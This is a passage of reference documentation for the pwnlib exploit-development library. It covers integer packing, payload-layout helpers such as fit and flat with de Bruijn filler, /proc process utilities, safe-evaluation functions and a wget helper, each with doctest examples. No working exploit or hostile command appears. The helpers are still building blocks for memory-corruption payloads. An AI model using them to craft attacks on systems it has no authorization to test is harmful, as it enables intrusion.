and struct.unpack
functions, and also adds support for packing/unpacking arbitrary-width
integers.
The packers are all context-aware for endian
and signed
arguments,
though they can be overridden in the parameters.
Examples
>>> p8(0)
'\x00'
>>> p32(0xdeadbeef)
'\xef\xbe\xad\xde'
>>> p32(0xdeadbeef, endian='big')
'\xde\xad\xbe\xef'
>>> with context.local(endian='big'): p32(0xdeadbeef)
'\xde\xad\xbe\xef'
Make a frozen packer, which does not change with context.
>>> p=make_packer('all')
>>> p(0xff)
'\xff'
>>> p(0x1ff)
'\xff\x01'
>>> with context.local(endian='big'): print repr(p(0x1ff))
'\xff\x01'
-
pwnlib.util.packing.
dd
(dst, src, count = 0, skip = 0, seek = 0, truncate = False) → dst[source]¶ Inspired by the command line tool
dd
, this function copies count byte values from offset seek in src to offset skip in dst. If count is 0, all ofsrc[seek:]
is copied.If dst is a mutable type it will be updated. Otherwise a new instance of the same type will be created. In either case the result is returned.
src can be an iterable of characters or integers, a unicode string or a file object. If it is an iterable of integers, each integer must be in the range [0;255]. If it is a unicode string, its UTF-8 encoding will be used.
The seek offset of file objects will be preserved.
Parameters: - dst – Supported types are :class:file, :class:list, :class:tuple, :class:str, :class:bytearray and :class:unicode.
- src – An iterable of byte values (characters or integers), a unicode string or a file object.
- count (int) – How many bytes to copy. If count is 0 or larger than
len(src[seek:])
, all bytes until the end of src are copied. - skip (int) – Offset in dst to copy to.
- seek (int) – Offset in src to copy from.
- truncate (bool) – If :const:True, dst is truncated at the last copied byte.
Returns: A modified version of dst. If dst is a mutable type it will be modified in-place.
Examples: >>> dd(tuple(‘Hello!’), ‘?’, skip = 5) (‘H’, ‘e’, ‘l’, ‘l’, ‘o’, ‘?’) >>> dd(list(‘Hello!’), (63,), skip = 5) [‘H’, ‘e’, ‘l’, ‘l’, ‘o’, ‘?’] >>> write(‘/tmp/foo’, ‘A’ * 10) ... dd(file(‘/tmp/foo’), file(‘/dev/zero’), skip = 3, count = 4) ... read(‘/tmp/foo’) ‘AAAAAA’ >>> write(‘/tmp/foo’, ‘A’ * 10) ... dd(file(‘/tmp/foo’), file(‘/dev/zero’), skip = 3, count = 4, truncate = True) ... read(‘/tmp/foo’) ‘AAA’
-
pwnlib.util.packing.
fit
(pieces, filler = de_bruijn(), length = None, preprocessor = None) → str[source]¶ Generates a string from a dictionary mapping offsets to data to place at that offset.
For each key-value pair in pieces, the key is either an offset or a byte sequence. In the latter case, the offset will be the lowest index at which the sequence occurs in filler. See examples below.
Each piece of data is passed to
flat()
along with the keyword arguments word_size, endianness and sign.Space between pieces of data is filled out using the iterable filler. The n‘th byte in the output will be byte at index
n % len(iterable)
byte in filler if it has finite length or the byte at index n otherwise.If length is given, the output will padded with bytes from filler to be this size. If the output is longer than length, a
ValueError
exception is raised.If entries in pieces overlap, a
ValueError
exception is raised.Parameters: - pieces – Offsets and values to output.
- length – The length of the output.
- filler – Iterable to use for padding.
- preprocessor (function) – Gets called on every element to optionally
transform the element before flattening. If
None
is returned, then the original value is used. - word_size (int) – Word size of the converted integer.
- endianness (str) – Endianness of the converted integer (“little”/”big”).
- sign (str) – Signedness of the converted integer (False/True)
Examples
>>> fit({12: 0x41414141, ... 24: 'Hello', ... }) 'aaaabaaacaaaAAAAeaaafaaaHello' >>> fit({'caaa': ''}) 'aaaabaaa' >>> fit({12: 'XXXX'}, filler = 'AB', length = 20) 'ABABABABABABXXXXABAB' >>> fit({ 8: [0x41414141, 0x42424242], ... 20: 'CCCC'}) 'aaaabaaaAAAABBBBeaaaCCCC'
-
pwnlib.util.packing.
flat
(*args, preprocessor = None, word_size = None, endianness = None, sign = None)[source]¶ Flattens the arguments into a string.
This function takes an arbitrary number of arbitrarily nested lists and tuples. It will then find every string and number inside those and flatten them out. Strings are inserted directly while numbers are packed using the
pack()
function.The three kwargs word_size, endianness and sign will default to using values in
pwnlib.context
if not specified as an argument.Parameters: - args – Values to flatten
- preprocessor (function) – Gets called on every element to optionally
transform the element before flattening. If
None
is returned, then the original value is uded. - word_size (int) – Word size of the converted integer.
- endianness (str) – Endianness of the converted integer (“little”/”big”).
- sign (str) – Signedness of the converted integer (False/True)
Examples
>>> flat(1, "test", [[["AB"]*2]*3], endianness = 'little', word_size = 16, sign = False) '\x01\x00testABABABABABAB' >>> flat([1, [2, 3]], preprocessor = lambda x: str(x+1)) '234'
-
pwnlib.util.packing.
make_packer
(word_size = None, endianness = None, sign = None) → number → str[source]¶ Creates a packer by “freezing” the given arguments.
Semantically calling
make_packer(w, e, s)(data)
is equivalent to callingpack(data, w, e, s)
. If word_size is one of 8, 16, 32 or 64, it is however faster to call this function, since it will then use a specialized version.Parameters: - word_size (int) – The word size to be baked into the returned packer or the string all.
- endianness (str) – The endianness to be baked into the returned packer. (“little”/”big”)
- sign (str) – The signness to be baked into the returned packer. (“unsigned”/”signed”)
- kwargs – Additional context flags, for setting by alias (e.g.
endian=
rather than index)
Returns: A function, which takes a single argument in the form of a number and returns a string of that number in a packed form.
Examples
>>> p = make_packer(32, endian='little', sign='unsigned') >>> p <function _p32lu at 0x...> >>> p(42) '*\x00\x00\x00' >>> p(-1) Traceback (most recent call last): ... error: integer out of range for 'I' format code >>> make_packer(33, endian='little', sign='unsigned') <function <lambda> at 0x...>
-
pwnlib.util.packing.
make_unpacker
(word_size = None, endianness = None, sign = None, **kwargs) → str → number[source]¶ Creates a unpacker by “freezing” the given arguments.
Semantically calling
make_unpacker(w, e, s)(data)
is equivalent to callingunpack(data, w, e, s)
. If word_size is one of 8, 16, 32 or 64, it is however faster to call this function, since it will then use a specialized version.Parameters: - word_size (int) – The word size to be baked into the returned packer.
- endianness (str) – The endianness to be baked into the returned packer. (“little”/”big”)
- sign (str) – The signness to be baked into the returned packer. (“unsigned”/”signed”)
- kwargs – Additional context flags, for setting by alias (e.g.
endian=
rather than index)
Returns: A function, which takes a single argument in the form of a string and returns a number of that string in an unpacked form.
Examples
>>> u = make_unpacker(32, endian='little', sign='unsigned') >>> u <function _u32lu at 0x...> >>> hex(u('/bin')) '0x6e69622f' >>> u('abcde') Traceback (most recent call last): ... error: unpack requires a string argument of length 4 >>> make_unpacker(33, endian='little', sign='unsigned') <function <lambda> at 0x...>
-
pwnlib.util.packing.
p16
(number, sign, endian, ...) → str[source]¶ Packs an 16-bit integer
Parameters: Returns: The packed number as a string
-
pwnlib.util.packing.
p32
(number, sign, endian, ...) → str[source]¶ Packs an 32-bit integer
Parameters: Returns: The packed number as a string
-
pwnlib.util.packing.
p64
(number, sign, endian, ...) → str[source]¶ Packs an 64-bit integer
Parameters: Returns: The packed number as a string
-
pwnlib.util.packing.
p8
(number, sign, endian, ...) → str[source]¶ Packs an 8-bit integer
Parameters: Returns: The packed number as a string
-
pwnlib.util.packing.
pack
(number, word_size = None, endianness = None, sign = None, **kwargs) → str[source]¶ Packs arbitrary-sized integer.
Word-size, endianness and signedness is done according to context.
word_size can be any positive number or the string “all”. Choosing the string “all” will output a string long enough to contain all the significant bits and thus be decodable by
unpack()
.word_size can be any positive number. The output will contain word_size/8 rounded up number of bytes. If word_size is not a multiple of 8, it will be padded with zeroes up to a byte boundary.
Parameters: Returns: The packed number as a string.
Examples
>>> pack(0x414243, 24, 'big', True) 'ABC' >>> pack(0x414243, 24, 'little', True) 'CBA' >>> pack(0x814243, 24, 'big', False) '\x81BC' >>> pack(0x814243, 24, 'big', True) Traceback (most recent call last): ... ValueError: pack(): number does not fit within word_size >>> pack(0x814243, 25, 'big', True) '\x00\x81BC' >>> pack(-1, 'all', 'little', True) '\xff' >>> pack(-256, 'all', 'big', True) '\xff\x00' >>> pack(0x0102030405, 'all', 'little', True) '\x05\x04\x03\x02\x01' >>> pack(-1) '\xff\xff\xff\xff' >>> pack(0x80000000, 'all', 'big', True) '\x00\x80\x00\x00\x00'
-
pwnlib.util.packing.
routine
(*a, **kw)[source]¶ u32(number, sign, endian, ...) -> int
Unpacks an 32-bit integer
Parameters: Returns: The unpacked number
-
pwnlib.util.packing.
u16
(number, sign, endian, ...) → int[source]¶ Unpacks an 16-bit integer
Parameters: Returns: The unpacked number
-
pwnlib.util.packing.
u32
(number, sign, endian, ...) → int[source]¶ Unpacks an 32-bit integer
Parameters: Returns: The unpacked number
-
pwnlib.util.packing.
u64
(number, sign, endian, ...) → int[source]¶ Unpacks an 64-bit integer
Parameters: Returns: The unpacked number
-
pwnlib.util.packing.
u8
(number, sign, endian, ...) → int[source]¶ Unpacks an 8-bit integer
Parameters: Returns: The unpacked number
-
pwnlib.util.packing.
unpack
(data, word_size = None, endianness = None, sign = None, **kwargs) → int[source]¶ Packs arbitrary-sized integer.
Word-size, endianness and signedness is done according to context.
word_size can be any positive number or the string “all”. Choosing the string “all” is equivalent to
len(data)*8
.If word_size is not a multiple of 8, then the bits used for padding are discarded.
Parameters: Returns: The unpacked number.
Examples
>>> hex(unpack('\xaa\x55', 16, endian='little', sign=False)) '0x55aa' >>> hex(unpack('\xaa\x55', 16, endian='big', sign=False)) '0xaa55' >>> hex(unpack('\xaa\x55', 16, endian='big', sign=True)) '-0x55ab' >>> hex(unpack('\xaa\x55', 15, endian='big', sign=True)) '0x2a55' >>> hex(unpack('\xff\x02\x03', 'all', endian='little', sign=True)) '0x302ff' >>> hex(unpack('\xff\x02\x03', 'all', endian='big', sign=True)) '-0xfdfd'
-
pwnlib.util.packing.
unpack_many
(*a, **kw)[source]¶ unpack(data, word_size = None, endianness = None, sign = None) -> int list
Splits data into groups of
word_size//8
bytes and callsunpack()
on each group. Returns a list of the results.word_size must be a multiple of 8 or the string “all”. In the latter case a singleton list will always be returned.
- Args
- number (int): String to convert word_size (int): Word size of the converted integers or the string “all”. endianness (str): Endianness of the converted integer (“little”/”big”) sign (str): Signedness of the converted integer (False/True) kwargs: Anything that can be passed to context.local
Returns: The unpacked numbers. Examples
>>> map(hex, unpack_many('\xaa\x55\xcc\x33', 16, endian='little', sign=False)) ['0x55aa', '0x33cc'] >>> map(hex, unpack_many('\xaa\x55\xcc\x33', 16, endian='big', sign=False)) ['0xaa55', '0xcc33'] >>> map(hex, unpack_many('\xaa\x55\xcc\x33', 16, endian='big', sign=True)) ['-0x55ab', '-0x33cd'] >>> map(hex, unpack_many('\xff\x02\x03', 'all', endian='little', sign=True)) ['0x302ff'] >>> map(hex, unpack_many('\xff\x02\x03', 'all', endian='big', sign=True)) ['-0xfdfd']
pwnlib.util.proc
— Working with /proc/
¶
-
pwnlib.util.proc.
ancestors
(pid) → int list[source]¶ Parameters: pid (int) – PID of the process. Returns: List of PIDs of whose parent process is pid or an ancestor of pid.
-
pwnlib.util.proc.
children
(ppid) → int list[source]¶ Parameters: pid (int) – PID of the process. Returns: List of PIDs of whose parent process is pid.
-
pwnlib.util.proc.
cmdline
(pid) → str list[source]¶ Parameters: pid (int) – PID of the process. Returns: A list of the fields in /proc/<pid>/cmdline
.
-
pwnlib.util.proc.
cwd
(pid) → str[source]¶ Parameters: pid (int) – PID of the process. Returns: The path of the process’s current working directory. I.e. what /proc/<pid>/cwd
points to.
-
pwnlib.util.proc.
descendants
(pid) → dict[source]¶ Parameters: pid (int) – PID of the process. Returns: Dictionary mapping the PID of each child of pid to it’s descendants.
-
pwnlib.util.proc.
exe
(pid) → str[source]¶ Parameters: pid (int) – PID of the process. Returns: The path of the binary of the process. I.e. what /proc/<pid>/exe
points to.
-
pwnlib.util.proc.
name
(pid) → str[source]¶ Parameters: pid (int) – PID of the process. Returns: Name of process as listed in /proc/<pid>/status
.Example
>>> name(os.getpid()) == os.path.basename(sys.argv[0]) True
-
pwnlib.util.proc.
parent
(pid) → int[source]¶ Parameters: pid (int) – PID of the process. Returns: Parent PID as listed in /proc/<pid>/status
underPPid
, or 0 if there is not parent.
-
pwnlib.util.proc.
pid_by_name
(name) → int list[source]¶ Parameters: name (str) – Name of program. Returns: List of PIDs matching name sorted by lifetime, youngest to oldest. Example
>>> os.getpid() in pid_by_name(name(os.getpid())) True
-
pwnlib.util.proc.
pidof
(target) → int list[source]¶ Get PID(s) of target. The returned PID(s) depends on the type of target:
str
: PIDs of all processes with a name matching target.pwnlib.tubes.process.process
: singleton list of the PID of target.pwnlib.tubes.sock.sock
: singleton list of the PID at the remote end of target if it is running on the host. Otherwise an empty list.
Parameters: target (object) – The target whose PID(s) to find. Returns: A list of found PIDs.
-
pwnlib.util.proc.
starttime
(pid) → float[source]¶ Parameters: pid (int) – PID of the process. Returns: The time (in seconds) the process started after system boot
-
pwnlib.util.proc.
stat
(pid) → str list[source]¶ Parameters: pid (int) – PID of the process. Returns: A list of the values in /proc/<pid>/stat
, with the exception that(
and)
has been removed from around the process name.
-
pwnlib.util.proc.
state
(pid) → str[source]¶ Parameters: pid (int) – PID of the process. Returns: State of the process as listed in /proc/<pid>/status
. See proc(5) for details.Example
>>> state(os.getpid()) 'R (running)'
-
pwnlib.util.proc.
status
(pid) → dict[source]¶ Get the status of a process.
Parameters: pid (int) – PID of the process. Returns: The contents of /proc/<pid>/status
as a dictionary.
pwnlib.util.safeeval
— Safe evaluation of python code¶
-
pwnlib.util.safeeval.
const
(expression) → value[source]¶ Safe Python constant evaluation
Evaluates a string that contains an expression describing a Python constant. Strings that are not valid Python expressions or that contain other code besides the constant raise ValueError.
Examples
>>> const("10") 10 >>> const("[1,2, (3,4), {'foo':'bar'}]") [1, 2, (3, 4), {'foo': 'bar'}] >>> const("[1]+[2]") Traceback (most recent call last): ... ValueError: opcode BINARY_ADD not allowed
-
pwnlib.util.safeeval.
expr
(expression) → value[source]¶ Safe Python expression evaluation
Evaluates a string that contains an expression that only uses Python constants. This can be used to e.g. evaluate a numerical expression from an untrusted source.
Examples
>>> expr("1+2") 3 >>> expr("[1,2]*2") [1, 2, 1, 2] >>> expr("__import__('sys').modules") Traceback (most recent call last): ... ValueError: opcode LOAD_NAME not allowed
-
pwnlib.util.safeeval.
test_expr
(expr, allowed_codes) → codeobj[source]¶ Test that the expression contains only the listed opcodes. If the expression is valid and contains only allowed codes, return the compiled code object. Otherwise raise a ValueError
-
pwnlib.util.safeeval.
values
(expression, dict) → value[source]¶ Safe Python expression evaluation
Evaluates a string that contains an expression that only uses Python constants and values from a supplied dictionary. This can be used to e.g. evaluate e.g. an argument to a syscall.
- Note: This is potentially unsafe if e.g. the __add__ method has side
- effects.
Examples
>>> values("A + 4", {'A': 6}) 10 >>> class Foo: ... def __add__(self, other): ... print "Firing the missiles" >>> values("A + 1", {'A': Foo()}) Firing the missiles >>> values("A.x", {'A': Foo()}) Traceback (most recent call last): ... ValueError: opcode LOAD_ATTR not allowed
pwnlib.util.web
— Utilities for working with the WWW¶
-
pwnlib.util.web.
wget
(url, save=None, timeout=5) → str[source]¶ Downloads a file via HTTP/HTTPS.
Parameters: Example
>>> url = 'https://httpbin.org/robots.txt' >>> result = wget(url) >>> result 'User-agent: *\nDisallow: /deny\n' >>> result2 = wget(url, True) >>> result == file('robots.txt').read() True
pwnlib.testexample
— Example Test Module¶
Module-level documentation would go here, along with a general description of the functionality. You can also add module-level doctests.
You can see what the documentation for this module will look like here: https://binjitsu.readthedocs.org/en/latest/testexample.html
The tests for this module are run when the documentation is automatically-generated
by Sphinx. This particular module is invoked by an “automodule” directive, which
imports everything in the module, or everything listed in __all__
in the module.
The doctests are automatically picked up by the >>>
symbol, like from
the Python prompt. For more on doctests, see the Python documentation.
All of the syntax in this file is ReStructuredText. You can find a nice cheat sheet here.
Here’s an example of a module-level doctest:
>>> add(3, add(2, add(1, 0)))
6
If doctests are wrong / broken, you can disable them temporarily.
>>> add(2, 2)
5
Some things in Python are non-deterministic, like dict
or set
ordering. There are a lot of ways to work around this, but the
accepted way of doing this is to test for equality.
>>> a = {a:a+1 for a in range(3)}
>>> a == {0:1, 1:2, 2:3}
True
In order to use other modules, they need to be imported from the RST which documents the module.
>>> os.path.basename('foo/bar')
'bar'